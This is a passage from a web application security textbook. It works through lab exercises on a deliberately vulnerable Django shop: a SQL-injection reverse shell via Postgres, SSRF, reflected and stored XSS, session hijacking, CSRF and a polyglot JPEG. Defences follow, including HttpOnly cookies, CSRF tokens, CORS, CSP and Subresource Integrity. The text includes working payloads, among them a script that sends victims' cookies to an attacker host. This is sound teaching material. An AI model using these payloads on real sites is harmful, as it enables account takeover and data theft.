End the shell session with Ctrl-C. Note that, because the Bash session is
interactive, the web page will not finish loading until you quit the reverse shell.
209
Chapter 7 Cookies and User Input
For clarity, we have split the command onto several lines. In a real
attack, it would be entered without the carriage returns.
The COPY … FROM PROGRAM … command is Postgres’ syntax for running
a shell command. The output is copied into a table. Of course, we need a
table to copy it into, so we create the table first.
For our reverse shell, we are not interested in the output, so we don’t
care if we can read the table or not (though we can with further SQL
injection commands). We just want the command to be run so that it
connects to our nc server.
Clearly, allowing the web application’s database user to run shell
commands is dangerous, and this feature should be disabled in all but very
specialist applications.
210
Chapter 7 Cookies and User Input
{"url": "https://shop1.com/product/1"}
{"url": "https://localhost:9000/admin"}
211
Chapter 7 Cookies and User Input
Since the embedded call is made from within the intranet, port 9000
on localhost is not blocked. If the administrators assumed that only
authorized users have access to this port and therefore do not protect
it with a username and password, the attacker can gain access without
needing to authenticate.
This may sound like a rather obvious vulnerability, yet it exists in the
real world. One existed in GitLab until June 2021 when it was patched.3
An embedded URL similar to the preceding situation was made available
to integrate GitHub projects with GitLab. The vulnerability arose because
attackers, even unauthenticated ones, could use the API call to make
calls to other hosts internal to the network where the GitLab instance was
running.
3
https://hackerone.com/bugs?report_id=301924&subject=gitlab
(login needed)
212
Chapter 7 Cookies and User Input
Reflected XSS
Before looking more closely at the impact XSS can have, let us look at
some examples. Recall the example in Section 7.4 where we considered a
vulnerable search form field. Imagine the results page contains the search
term as well as the matches, for example:
<script>
some malicious JavaScript code
</script>
213
Chapter 7 Cookies and User Input
Then, when the search results are displayed, the page will contain the
JavaScript, enclosed in legal HTML <script> … </script> tags, and would
therefore be executed.
This is an example of Reflected XSS. The JavaScript is not stored on the
server but is sent to the browser in the response and executed there.
The code is only executed in the attacker’s browser. Other users do
not receive the code. This may still have a harmful impact if the developer
assumed certain JavaScript code would or would not be executed. For
example, client-side form validation.
However, if this is the goal of the attacker, there is an easier way to have
JavaScript code executed in their browser: by editing the HTTP response
before it reaches the browser. We will do this in the next exercise.
If you followed the setup instructions in Chapter 2, you should have HTTP
Toolkit installed. We will use this to intercept and alter requests from our
Coffeeshop application.
Start HTTP Toolkit. Click on the button labelled Chrome Intercept a fresh
independent Chrome window. This will open a new Chrome instance. Return
to HTTP Toolkit and click on the Mock icon in the menu bar on the left. We can
use this tab to add rules when websites are visited.
214
Chapter 7 Cookies and User Input
Click on the + Add a new rule to rewrite requests or responses button. In the
Match drop-down, select Any requests, and in the Then drop-down, select
Pause the response to manually edit it.
Under Any requests, you will see another drop-down titled Add another
matcher and a Plus button. Click the drop-down and select For a URL. Enter
our Coffeeshop application root URL underneath, http://10.50.2/. Your
window should look like Figure 7-1. Now click on the Plus button to save the
matcher and then the Save button to save the rule.
You can now return to the Chrome window HTTP Toolkit opened and visit
our website, http://10.50.0.2/. HTTP Toolkit will pause before the
response is displayed. Return to the HTTP Toolkit. On the left you will see a
list of requests Chrome has made. On the right you will see the response it
is currently loading. Scroll down to the bottom of the response, down to just
above the </body> tag, and enter some JavaScript:
<script>
alert(document.cookie);
</script>
215
Chapter 7 Cookies and User Input
Your window should look like Figure 7-2. Now click on the Resume button.
Chrome will finish loading the page and execute your JavaScript, displaying
your session ID and CSRF token cookies.
You can now close HTTP Toolkit. It will also close the Chrome window.
Hackers are less interested in their own cookies than in other people’s
and so are more likely to try to get JavaScript code executed by a victim’s
browser, not their own.
One way would be to send a victim a link to a page with a reflected
XSS vulnerability, crafting the link to contain malicious JavaScript. The
Coffeeshop application has a vulnerable page to display a product,
using the URL
http://10.50.0.2/prod/?id=\textsl{productid}
http://10.50.0.2/prod/?id=1
216
Chapter 7 Cookies and User Input
http://10.50.0.2/prod/?id=%3Cscript%3Ealert%28%22Hacked%22%2
9%3C%2Fscript%3E
<script>alert("Hacked")</script>
to be pasted into the page and executed. If this is emailed to a victim, it will
be executed in their browser. You can try this on your Coffeeshop instance
and verify that it works.
Another way to get someone else to execute your JavaScript is to get it
stored on the server. This is where Stored XSS comes in.
Stored XSS
Sometimes, user input is persisted in an application’s database and
then displayed in HTML pages. Examples include social media posts,
blog posts, product reviews, and so on. If an attacker can get malicious
JavaScript code stored there, it will be executed whenever another user
visits the page that displays that input. It will be executed as that user, with
that user’s cookies.
Our Coffeeshop application has one such vulnerability, in a form
where users can leave comments about products. We will exploit this in the
next exercise.
217
Chapter 7 Cookies and User Input
If you are logged in, you will see a box to enter a comment at the bottom of the
page. Enter
Nice coffee
<script>
alert(document.cookie)
</script>
Now reload the page. You will see the alert pop up with your session ID and the
CSRF cookie. If you log out and log in again as the alice, then her cookies
will be displayed.
http://10.50.0.3/cookies/cookie-value
Take a look at the code in the views.py file for CSThirdparty. The
function is called cookies() and is quite simple.
One easy way of getting a GET URL called in JavaScript is to create an
<img> tag and set the source to our URL:
var i = document.createElement("img");
i.src = "http://... ";
218
Chapter 7 Cookies and User Input
There are other approaches, but this one is short and synchronous,
avoiding potential issues such as short comment fields in the database.
Still in Chrome as user bob, delete your comment with the Delete button.
Using the preceding img tag approach, we will create a new one using the
JavaScript shown before to call
http://10.50.0.3/cookies/cookie-value
Nice coffee
<script>
var i = document.createElement("img");
i.src = "http://10.50.0.3/cookies/" + document.cookie;
</script>
Reload the page and then have a look in the csthirdparty database. The
easiest way is to log into your CSThirdparty VM with
vagrant ssh
219
Chapter 7 Cookies and User Input
You should find the user’s cookies in the csthirdparty_cookies table with
An attacker can use the stolen session ID cookie to log in as the user it
belongs to. Log out from the Coffeeshop application and reload the page. Now
open the Developer Tools by clicking the three vertical dots in the top-right
corner of the browser; then select More Tools followed by Developer Tools.
Click on the Console icon. Type the following:
document.cookie="sessionid=session-id-from-database"
substituting the session ID value from the cookie you saved in the
CSThirdparty database.
Now refresh the page and close the Developer Tools. You should find that you
are now logged in as bob.
To clean up, delete the comment again. You can also delete the cookies from
the database.
DOM-Based XSS
Dom-based XSS vulnerabilities occur when an attacker can submit
JavaScript (through GET parameters, form input, etc.) that is used when
modifying the DOM programmatically, for example, using innerHTML.
Consider, for example, a page for reporting an error. When the URL
http://example.com/error?errortext=error-message
220
Chapter 7 Cookies and User Input
coffeeshopsite/coffeeshop/templates/coffeeshop/product.html
{{ comment.comment | safe }}
221
Chapter 7 Cookies and User Input
222
Chapter 7 Cookies and User Input
chrome://settings/siteData
223
Chapter 7 Cookies and User Input
http://10.50.0.2
We will fix the XSS vulnerability in the product comments using two methods:
1. Change the session cookie settings in settings.py.
SESSION_COOKIE_HTTPONLY = False
to
SESSION_COOKIE_HTTPONLY = True
Restart Apache with sudo apachectl restart, log in as bob again, and
create a new comment with the alert() to display the cookie (see the
exercise “Exploiting a Stored XSS Vulnerability”) with the JavaScript code,
reload and confirm the cookie is not displayed.
Note that the CSRF token cookie will still be displayed as this setting applies to
the session ID cookie only.
Delete the cookie before proceeding to method 2. Open product.html in
coffeeshop/vagrant/coffeeshopsite/coffeeshop/templates/
coffeeshop
and change
{{ comment.comment | safe }}
to
{{ comment.comment }}
224
Chapter 7 Cookies and User Input
HTML Injection
Before leaving XSS, we should discuss the related vulnerability of HTML
injection. This occurs when an attacker can get HTML code interpreted
as part of a page. We include it here rather than in the section on injection
as it arises from the same vulnerability. The difference between this and
Stored XSS is that the injected text is HTML not JavaScript.
Even without JavaScript code, HTML injection can be harmful. An
attacker can deface a site by adding images with IMG tags or entire pages
with <iframe> tags. They can create links that can be used to track visitors
or deliver malware.
Defending against HTML injection is the same as against XSS—sanitize
user input.
7.8 Content Sniffing
We looked at potential vulnerabilities of file uploading in Chapter 5.
Among the defenses, we said developers should confirm that the file type
matches what is expected.
It is possible for a file to simultaneously be valid syntax for more than
one file type. These are called polyglot files. They can potentially be useful
to attackers because of a feature in browsers that causes them to change
the content type from what was given in the server’s HTTP response.
225
Chapter 7 Cookies and User Input
<script src="myimage.jpg"></script>
Most web servers derive the Content-Type header from the file
extension. When the client requests myimage.jpg, the server looks at the
extension and sends the image with Content-Type: image/jpeg. The
script should fail to execute.
However, many browsers try to be clever and assume the server has
made an error. The browser is expecting application/javascript but
receives image/jpeg. Believing the server may have sent the wrong content
type, it inspects the file to check if it is actually JavaScript. As the image
is both valid JPEG and JavaScript, the browser will decide it is actually a
script and will execute it.
This is a somewhat esoteric vulnerability, but it can be demonstrated
to be exploitable. Gareth Heyes at PortSwigger demonstrated that he can
create a file that is simultaneously valid JPEG and JavaScript.4 We have
extended this idea to create a script that can join (more or less) arbitrary
JPEG images and JavaScript files into one file, which is valid syntax for both.
If you look at your coffeeshop Git clone, you will see a directory called
other/jpgjs containing this script along with an example. The JPEG/
4
https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs
226
Chapter 7 Cookies and User Input
<img src="hackedimage.jpg">
<script charset="ISO-8859-1" src="hackedimage.jpg"></script>
X-Content-Type-Options: nosniff
which instructs the browser not to perform this content inspection. It can
be added to all responses.
In Django, the nosniff header is enabled and disabled with the
SECURE_CONTENT_TYPE_NOSNIFF variable in settings.py. It is set to True
by default, adding the preceding header to all responses.
7.9 Summary
Code that handles user input is a common source of vulnerabilities in web
applications. We saw that it gives attackers the opportunity to have their
own code executed on the server or by victims’ browsers.
We looked at how cookies work and how to set their parameters safely,
for example, by giving appropriate values to the SameSite parameter.
We examined user input–oriented vulnerabilities and how to secure
code against them.
227
Chapter 7 Cookies and User Input
228
CHAPTER 8
Cross-Site Requests
This chapter is about the threats that occur when your site accesses
other sites and when your site is accessed from another site. We saw
one example in the last chapter, in the exercise “Exploiting a Stored XSS
Vulnerability.” Here, you as the attacker were able to exploit a vulnerability
and upload malicious JavaScript that sent victims’ cookies to your site.
We will look at three features web browsers offer to protect against
cross-site attacks and to safely allow cross-site requests to legitimate servers:
Cross-Origin Resource Sharing (CORS), Content Security Policy (CSP),
and Subresource Integrity (SRI).
SOP is a client-side defense. A malicious user can still access your API
synchronously as only JavaScript calls are blocked. It is designed to protect
users from malicious sites that misuse your APIs. It does not protect your
APIs against calls from a malicious user (we need other defenses for that,
such as authentication).
Sometimes, however, we do want to allow these calls. For example, we
may have our API on a different port, or on a different host, from the rest
of the client. We may want to make a public API. Cross-Origin Resource
Sharing (CORS) enables us as developers to allow JavaScript cross-site
requests from sites we specifically name (or all sites, if we wish). This is a
security relaxation rather than a security feature; therefore, it should be
used cautiously. It relaxes SOP.
CORS is implemented as HTTP headers, but before we look at the
syntax, let us look at what CORS does. CORS divides requests into simple
and preflighted requests. Simple requests must satisfy the following rules:
–– Accept-Language
–– Content-Language
–– Content-Type
–– application/x-www-form-urlencoded
–– multipart/form-data
–– text/plain
230
Chapter 8 Cross-Site Requests
231
Chapter 8 Cross-Site Requests
CORS and Credentials
The Access-Control-Allow-Credentials needs special mention.
Ordinarily, cookies and authorization headers are not sent by the client in
a request, and they are not accepted in the response.
To enable cookies and authorization headers, the server has to set
Access-Control-Allow-Credentials to true in the response. Also, the
client has to set withCredentials to true in the XMLHttpRequest object.
The reason for the apparent redundancy of setting it twice is to provide
two-way protection: the client from a malicious server and vice versa.
Imagine only withCredentials was needed. Then an attacker could
write a malicious website evilhacker.com that made an API call to your
site. If one of your customers visits evilhacker.com, their credentials
would be passed to your site in the API call, logging them in. Then
evilhacker.com could perform operations as that user. This is a cross-site
request forgery attack, which we discuss in more detail in Section 8.2.
232
Chapter 8 Cross-Site Requests
233
Chapter 8 Cross-Site Requests
<VirtualHost *:80>
...
Header set Access-Control-Allow-Origin example.com
...
</VirtualHost>
234
Chapter 8 Cross-Site Requests
INSTALLED_APPS = [
...
'corsheaders',
...
]
MIDDLEWARE = [
...
'corsheaders.middleware.CorsMiddleware',
...
]
An example is
CORS_ALLOWED_ORIGINS = [
'https://example.com',
'http://localhost:5000',
]
235
Chapter 8 Cross-Site Requests
Note that CORS itself does not allow regular expressions in Access-
Control-Allow-Origin. The django-cors-headers module does the
matching, and if the request’s origin matches the one of the regular
expressions, the Access-Control-Allow-Origin header is set to that origin.
Other CORS headers can be added with the following variables:
CORS_ALLOW_ALL_ORIGINS = True
#CORS_ALLOWED_ORIGINS = []
CORS_ALLOW_CREDENTIALS = True
Start HTTP Toolkit and start a Firefox (not Chrome) window by clicking
the Firefox: Intercept a fresh independent Firefox window button. Visit
http://10.50.0.2/corstest. This page has three buttons which load
JSON data from three URLs on CSThirdparty:
1
https://github.com/adamchainz/django-cors-headers
236
Chapter 8 Cross-Site Requests
Click on the Test GET and look at the HTTP Toolkit window. Near the bottom
of the page you should see the GET request to /gettest. Notice that no
preflight request was made, just the GET. Click /gettest/ and scroll through the
response and notice the access-control-allow- headers. The access-
control-allow-origin header is set to http://10.50.0.2 even though
Django has CORS_ALLOW_ALL_ORIGINS = True. The django-cors-
framework replaces the origin with that of the request when sending the
response.
Now click Test POST. You should see that the browser sent an OPTIONS
request before making the POST. At the time of writing, both Firefox and
Chrome display the OPTIONS request in their developer tools. However, certain
versions do not, and it may be removed in future released. This is why we are
using HTTP Toolkit.
237
Chapter 8 Cross-Site Requests
When you clicked on Test Credentials, the server set the corstest cookie,
with SameSite set to None.
Close the alert and click Test Credentials again. We can see that the server
received the corstest cookie it set in the previous click, but the document.
cookie variable does not contain corstest: it is not visible by the page on
10.50.0.2.
This test is why we are using Firefox, not Chrome. Recall from earlier that
Chrome will not send the cookie without SameSite=None and Secure. We
cannot set Secure without first configuring HTTPS. At the time of writing, this
is not the case with Firefox. Later versions may also enforce this, so if your
cookie does not appear in the alert window, this may be the reason.
CORS_ALLOW_ALL_ORIGINS = False
CORS_ALLOWED_ORIGINS = []
CORS_ALLOW_CREDENTIALS = True
238
Chapter 8 Cross-Site Requests
Reload the page and try each of the buttons again. When making the simple
GET request, the request is sent to the server, and the server sends the
response, but JavaScript rejects it. When making the preflighted POST request,
the OPTIONS request is made to the server, and the server responds, but the
client does not follow this with the POST request.
To end the exercise, return the CORS variables to their original values to allow
requests from all origins (or add http://10.50.0.2). It is needed by other
parts of the application. Remember to restart Apache.
https://bank.com/api/transfer?to=account-number&amt=amount
2
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
239
Chapter 8 Cross-Site Requests
The site uses session ID cookies to keep its users logged in between
requests. If the user is logged in, executing that API call will transfer funds
from their account to the recipient’s account.
Now imagine an attacker sends a customer of bank.com a link to that
URL. The account number is that of the attacker. Perhaps it is in an email
with the link text “Congratulations! You have won a prize. Click here to
claim it.” If the customer has already authenticated with bank.com (i.e.,
has a valid session ID), the API call will be successful, and funds will be
transferred to the attacker.
The process is illustrated in Figure 8-2. The hacker crafts a link and
sends it to the victim. The victim clicks it and unknowingly performs an
action in the hacker’s favor.
You have already seen one defense against this attack: don’t allow GET
requests to change state. This works because the attack relies on the hacker
being able to send the victim a link to click on. It is difficult to craft a POST
link and send it to the user.
240
Chapter 8 Cross-Site Requests
However, if bank.com uses POST for the transfer API rather than
GET, the hacker can instead send the victim a link to their own site, say,
evilhacker.com, rather than to bank.com. The page on evilhacker.com
will contain an enticing link. Again, this may be encouraging the victim to
click on a link to claim a prize. The HTML might look like the following:
The link submits a form with hidden inputs. If the user has a session ID
cookie, the transaction will be executed.
The second link can be avoided by the attacker automating the form
submission with
window.onload = function() {
document.getElementById('myform').submit();
};
241
Chapter 8 Cross-Site Requests
CSRF Tokens
Aside from session cookie settings, to prevent the preceding POST attack,
we would ideally like to confirm that the request originated from bank.
com, not a malicious site. One approach is to check the value of the Referer
header. However, this can be spoofed. The alternative is to use a CSRF
token. These are random, unguessable tokens sent to the client. The client
must include the token when submitting a form. The server verifies it is
correct before performing the action.
Tokens should be unique to a user’s session so that an attacker can’t
grab one in advance and paste it into the victim’s request. It should be long
enough to make guessing or brute force infeasible. There is an argument
for making the tokens unique per request, but as this adds usability
complexity, making tokens unique to the user’s session is also common.
There are two common patterns for CSRF tokens: the synchronizer
pattern and the double-submit cookie pattern.
The synchronizer pattern is illustrated in Figure 8-3. The server creates
a CSRF token and stores it in the database associated with the client’s
session. This is sent to the client in the page that contains the form, for
example, as a hidden <input> field. When the client submits the form, the
server validates the token in the form field with the value in the database.
The double-submit cookie pattern avoids storing the CSRF token
server side; therefore, it works when there is no session. It is illustrated in
Figure 8-4. The server sends the token both as a hidden <input> field and
as a cookie. When the client submits the form, the server checks that the
form element and cookie match.
Both methods provide CSRF protection by requiring the client to make
two requests in order to submit a form: one to get the CSRF token and the
other to submit it. It is difficult for an attacker to automate this with a link
sent to the victim.
242
Chapter 8 Cross-Site Requests
243
Chapter 8 Cross-Site Requests
{% csrf_token %}
244
Chapter 8 Cross-Site Requests
For API calls, the CSRF token can instead be passed in the X-CSRFToken
header. For example, we could use the following JQuery ajax() call:
$.ajax({
type: "POST",
url: "https://bank.com/api/transfer/",
data: $('#myform').serialize(),
contentType: "application/x-www-form-urlencoded",
headers: {
"X-CSRFToken": getCookie("csrftoken")
}
success: function(data){
...
},
});
CSRF Attacks
CSRF tokens, cookie SameSite settings, and POST requests vs. GET all help
defend against CSRF attacks. There are other defenses, but to understand
them better, let’s launch a CSRF attack against a Coffeeshop user.
At the time of writing, Firefox’s default cookie SameSite setting is None.
Unlike Chrome, the Secure flag does not have to be set for cookies to be
sent (see Section 7.2 for a discussion). It may be that by the time you read
3
https://docs.djangoproject.com/en/3.2/ref/csrf/
245
Chapter 8 Cross-Site Requests
this book, the latest version of Firefox, like Chrome, defaults SameSite
to None and requires Secure to be set. If you find that this is the case, the
following exercise, “Launching a CSRF Attack,” will not work. You can still
do by first performing the following steps before starting the exercise:
1. Edit coffeeshopsite/coffeeshopsite/settings.
py. Change
SESSION_COOKIE_SAMESITE = None
SESSION_COOKIE_SECURE = False
to
cd /vagrant/coffeeshopsite
python3 manage.py runsslserver 0:8100
https://10.50.0.2:8100
246
Chapter 8 Cross-Site Requests
The HTML contains a hidden form that calls this URL with the Evil Hacker’s
email address. The URL requires the current email address to be sent along
with the new one, so the page prompts the victim for this. Enter Bob’s email
address [email protected] and click Submit. The Submit button puts the victim’s
typed email address into the hidden form and submits it.
You will notice two things. Visit http://10.50.0.2 and click My Account.
You will see the email address has been changed. Use this opportunity to
change it back to [email protected].
247
Chapter 8 Cross-Site Requests
The other thing you will notice is that after clicking Submit, a page is displayed
confirming Bob’s password has been changed. This is likely to alert Bob to the fact
his account has been hacked. Most likely, he will immediately change his email
address back (unless the Evil Hacker is very quick in resetting the password).
Ideally, as a hacker, we would like to hide the response page. Open the HTML
template
csthirdparty/vagrant/csthirdpartysite/csthirdparty/templates/
csthirdparty/youhavewon.html
Uncomment the Ajax call and comment out form.submit(). Your function
should look like the following:
function sendemail() {
var enteredemail = document.
getElementById('enteredemail').value;
var form = document.getElementById('changeemailform');
document.getElementById('old_email').setAttribute('value',
enteredemail);
//form.submit()
$.ajax({
type: "POST",
url: "http://10.50.0.2/changeemail",
data: $('#changeemailform').serialize(),
// serializes the form's elements.
248
Chapter 8 Cross-Site Requests
xhrFields: {
withCredentials: true
},
success: function(html){
alert("Thank you. We will contact you shortly")
},
crossDomain: true
});
}
Restart Apache in the CSThirdparty VM and reload the page. Now enter
Bob’s email again and click Submit. This time you will see a more deceptive
response, and Bob’s email has still been changed.
CSRF tokens would have prevented both these attacks. However, the
attacker may have been able to request one in an Ajax request. When the
form is submitted, JavaScript code makes an Ajax request to a page that
contains the CSRF token and parses the response to extract the CSRF
token. It has to be in the body of the message, for example, in a hidden
<input> field or JSON response. If it were just in a cookie, our page would
not be able to read it as it is a cross-site request.
The other requirement is that the site does not check that the CSRF
token is sent as a cookie by the client. Again, as we are making a cross-site
request, we cannot send a cookie to 10.50.0.2.
Django’s default CSRF mechanism is the double-submit cookie
pattern that does require the CSRF token to be in a cookie. Therefore,
the preceding attack would not work. Django supports the alternative
synchronizer pattern. This does not require that the CSRF token
be in a cookie and also does not set it in one. The preceding attack
would therefore succeed. We will try this in the next exercise. Again,
249
Chapter 8 Cross-Site Requests
Now edit Coffeeshop’s settings.py. At the end, you will see the line
#CSRF_USE_SESSIONS = True
Uncomment this line and restart Apache. This switches Django’s CSRF
handling from the double-submit cookie method to the synchronizer pattern.
Now click on the Test CSRF button again. This time http://10.50.0.2/
testcsrftoken will succeed.
250
Chapter 8 Cross-Site Requests
We have demonstrated that we can make a CSRF attack even if a CSRF token
is required, but only if it doesn’t have to be present in a cookie.
CSRF and CORS
The last exercise demonstrated that CSRF tokens do not protect against all
CSRF attacks. However, CSRF tokens together with the Same-Origin Policy do.
Recall that if an Ajax request is preflighted, the browser first sends a
preflight OPTIONS request. Unless the origin were allowed, the browser
would not follow it with the original request.
If the Ajax request is simple, the browser would reject the response,
but as we saw in Section 8.1, the action would still have been performed on
the server.
Both our asynchronous Ajax calls were preflighted because they include
nonstandard headers, specifically Cookie. This is why modern browsers first
make preflight requests—to prevent actions being executed on the server.
Our synchronous form submission would still have been executed
because it is not made through XMLHttpRequest. However, when a CSRF
token is required, the only way to fetch this is with the preflighted Ajax
request.
Our attacks worked because we used CORS to override the Same-
Origin Policy (SOP). If we remove the @csrf_excempt decorator and switch
CORS off with
251
Chapter 8 Cross-Site Requests
CORS_ALLOW_ALL_ORIGINS = False
CORS_ALLOWED_ORIGINS = []
then the CSRF attacks no longer work, neither with cookie- nor session-
based CSRF tokens.
• CSRF_COOKIE_AGE
• CSRF_COOKIE_DOMAIN
• CSRF_COOKIE_HTTPONLY
• CSRF_COOKIE_PATH
• CSRF_COOKIE_SAMESITE
• CSRF_COOKIE_SECURE
CSRF Summary
The safest strategy for preventing CSRF attacks is to do all of the following:
252
Chapter 8 Cross-Site Requests
253
Chapter 8 Cross-Site Requests
254
Chapter 8 Cross-Site Requests
With X-Frame-Options set, the page would fail to load, but the action
would still be executed and the response sent. A CSRF token and SOP
prevent the attack because the CSRF token cannot be fetched.
where
255
Chapter 8 Cross-Site Requests
The most common directives are fetch directives, which define the
allowed origins for a type of resource. The value is a list of origins. An
example is
256
Chapter 8 Cross-Site Requests
Recall the exercise in Section 7.7 where we were able to steal session
cookies by sending them to an Evil Hacker’s URL using an <img> tag:
<script>
var i = document.createElement("img");
i.src = "http://10.50.0.3/cookies/" + document.cookie;
</script>
4
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/
Content-Security-Policy
257
Chapter 8 Cross-Site Requests
Fetch Directives
child-src Web workers, for example, in <frame> and <iframe> tags
connect-src Resources loaded through script interfaces (e.g.,
XMLHttpRequest)
default-src Default source if not overridden by another
font-src Fonts loaded using @font_face in CSS
frame-src Resources loaded in <frame> and <iframe> tags
img-src Images and favicons
manifest-src Manifest files
media-src Media resources in <audio>, <video>, and <track> tags
object-src Resources in <object>, <embed>, and <applet> tags
(continued)
258
Chapter 8 Cross-Site Requests
Directive Meaning
259
Chapter 8 Cross-Site Requests
Directive Meaning
Reporting Directives
report-uri When a CSP violation occurs, a JSON report is sent by POST
to this URI
report-to Fires a SecurityPolicyViolationEvent (intended to
replace report-to)
Other Directives
require-sri-for Script and stylesheet resources for which an SRI is required
(see Section 8.5)
require-trusted- Enforce trusted types
types-for
upgrade- Treat HTTP requests from these origins as though they were
insecure- served over HTTPS (if the requesting document were loaded
requests over HTTPS, these may refuse to load otherwise)
260
Chapter 8 Cross-Site Requests
<script nonce="jfdgikHH7fgj6KJH">
...
</script>
Include the same nonce value in the CSP header, for example:
Content-Security-Policy: default-src: *;
script-src 'self' 'https://cdn.example.com' 'nonce-
jfdgikHH7fgj6KJH'
Nonces are only secure if they change with each page load; therefore,
both the document body and Content-Security-Policy header need to
be dynamically generated.
Nonces given in a script-src policy directive also apply to event
handlers. Therefore, the preceding setting for script-src would prevent
the following JavaScript from executing, as it does not have a nonce:
261
Chapter 8 Cross-Site Requests
If you wish to protect inline <script> tags but not event handlers, you
can use the script-src-elem directive instead of script-src. This does
weaken protection against XSS as attackers can add JavaScript to event
handlers such as onclick and onmouseover.
An alternative to nonces is SHA hashes. These can be 256, 384, or
512 bits. To use them, create a hash of your inline script (including the
<script> and </script> tags), for example, with openssl:
Content-Security-Policy: default-src: *;
script-src 'self' 'https://cdn.example.com'
'sha256-your-sha-hash'
The advantage of SHA hashes over nonces is that your HTML file
does not need to be dynamically created. The disadvantage is you have to
recompute the SHA hash each time the script changes.
If you do not want to use nonces or SHA hashes but still want to
support inline scripts, you can use 'unsafe-inline'. For example:
Content-Security-Policy: default-src: *;
script-src 'self' 'https://cdn.example.com' 'unsafe-inline'
will allow inline <script> tags and event handlers without a hash or nonce. It
is considered unsafe because it negates CSP’s protection against XSS.
CSP allows additional policy directives beyond those that define
document sources. We will not describe all in this book. See Mozilla’s MDN
Web Docs entry for details. The reporting directives are useful, however,
and they are described in the following.
262
Chapter 8 Cross-Site Requests
CSP Reporting
Developers and site operators often want to know if a resource has been
blocked. Firstly, it may be an indication that an XSS or other attack
has been attempted. Secondly, the CSP header may be inaccurate and
resources blocked unintentionally. CSP provides two directives for this
purpose: report-uri and report-to.
The report-uri directive allows you to define a URL that CSP
violations will be sent to. The URI is called as a POST request with the
violation in the body as a JSON report. An example is
Report-To: {
"group": "csp-violation",
"max_age": 2592000,
"endpoints": [
{ "url": "https://example.com/csp-violation" }
] }
}
263
Chapter 8 Cross-Site Requests
CSP in Django
The Django-CSP package integrates CSP header handling into Django. It
allows developers to set CSP headers using variables in settings.py and
provides nonce functionality. Install it with
264
Chapter 8 Cross-Site Requests
@csp_exempt
def myview(request):
...
def myview(request):
...
response = HttpResponse(body)
response._csp_exempt = True
return response
@csp_update(IMG_SRC="images.example.com")
def myview(request):
...
265
Chapter 8 Cross-Site Requests
@csp_replace(IMG_SRC="images.example.com")
def myview(request):
...
Nonces in Django
Django-CSP supports nonces. Define which directives to include a nonce
for with CSP_INCLUDE_NONCE_IN, for example:
CSP_INCLUDE_NONCE_IN = ('script_src')
Django will create a new one per page load and include it in the
header. In the <script> tag in your template, include the nonce with
<script nonce="{{request.csp_nonce}}">
5
https://django-csp.readthedocs.io/en/latest/index.html
266
Chapter 8 Cross-Site Requests
CSP IN DJANGO
The Coffeeshop application has a photo gallery that loads images from
CSThirdparty. We use it to explore CSP settings. Open the Coffeeshop
application in a web browser and click Gallery in the top menu bar.
Three images are loaded from 10.50.0.3 and presented as a slideshow. The
slideshow JavaScript code is also loaded from 10.50.0.3. A small amount of
inline JavaScript code is in the gallery page to initialize the slideshow:
<script>
$( document ).ready(function() {
currentSlide(1);
});
</script>
The data: schema is in the CSP directive because the forward and back
icons in the slideshow are loaded as inline SVG with this schema. Add a CSP
line to restrict image loading to just 'self' (and data:). Also tell Django-CSP
to include nonces in script tags:
Restart Apache, reload the page, and observe the images no longer load.
CSP violations are sent to the URI /email_csp_report/. This maps to the
view email_csp_report(), which emails the JSON report. Open MailCatcher
and view the emails. Now change your CSP settings to allow the images to load:
267
Chapter 8 Cross-Site Requests
Restart Apache.
Let’s protect our scripts. In the settings.py, add a new CSP directive for
scripts with the following line:
CSP_SCRIPT_SRC = ("*")
Restart Apache and reload the page. The slideshow should fail because CSP
prevents the <script> … </script> block at the end of the page, plus the
<script> tags at the beginning that load the JavaScript files, from loading.
Open the gallery.html template file. For each of the two <script> tags,
add the following attribute:
nonce="{{request.csp_nonce}}"
Also do this to the <script> tags in base.html. This is the base template
that is included by all other templates, including gallery.html.
There is one more thing to fix. The slideshow.js file adds an inline event
handler for when the forward and back buttons, and the dot icons, are
clicked. This is still blocked by CSP. Unblock them by adding the following to
settings.py:
Restart Apache, reload the page, and the slideshow should work again. Clean
up by restoring CSP to its original settings:
You can leave the nonces in the templates: they are not used unless
required by CSP.
268
Chapter 8 Cross-Site Requests
Paste the resulting hash into the integrity attribute of the <script> or
<link> tag, for example:
Access-Control-Allow-Origin: *
Let’s add Subresource Integrity checking for the slideshow.js script loaded
from the CSThirdparty site into the gallery page.
First, make sure CORS is enabled in CSThirdparty, for example, with the
following line in settings.py:
CORS_ALLOW_ALL_ORIGINS = True
269
Chapter 8 Cross-Site Requests
/vagrant/csthirdpartysite/csthirdparty/static/csthirdparty/js
cat /vagrant/csthirdpartysite/csthirdparty/static/csthirdparty/
js/slideshow.js | \
openssl dgst -sha256 -binary | openssl base64
In real life, you may not have access to the server that hosts the file, but you
can fetch it with Curl:
curl http://10.50.0.3/static/csthirdparty/js/slideshow.js
8.6 Summary
Our sites often need to access external resources, such as images,
JavaScript code, REST APIs, and so forth. This brings risks because one
can unknowingly load resources from malicious sites. In this chapter, we
looked at three ways to protect us from cross-site exploitation.
Browsers prevent access to cross-site resources in asynchronous
JavaScript calls by default. Cross-Origin Resource Sharing (CORS) allows
us to relax this in a controlled way. Content Security Policy (CSP) allows us
to whitelist sources for individual resource types, such as images or scripts.
Subresource Integrity allows us to prevent browsers from loading a script if
its hash does not match a given value.
In the next chapter, we will look at how to safely manage passwords.
270
CHAPTER 9
Password
Management
In this chapter, we will look at the storage and management of passwords,
both for our users and for accessing services like databases.
Passwords are often the weakest link in web application security. This
is because they rely on humans to be secure. We have two types of attack to
consider:
1. Cracking a password
272
Chapter 9 Password Management
Brute-Force Attacks
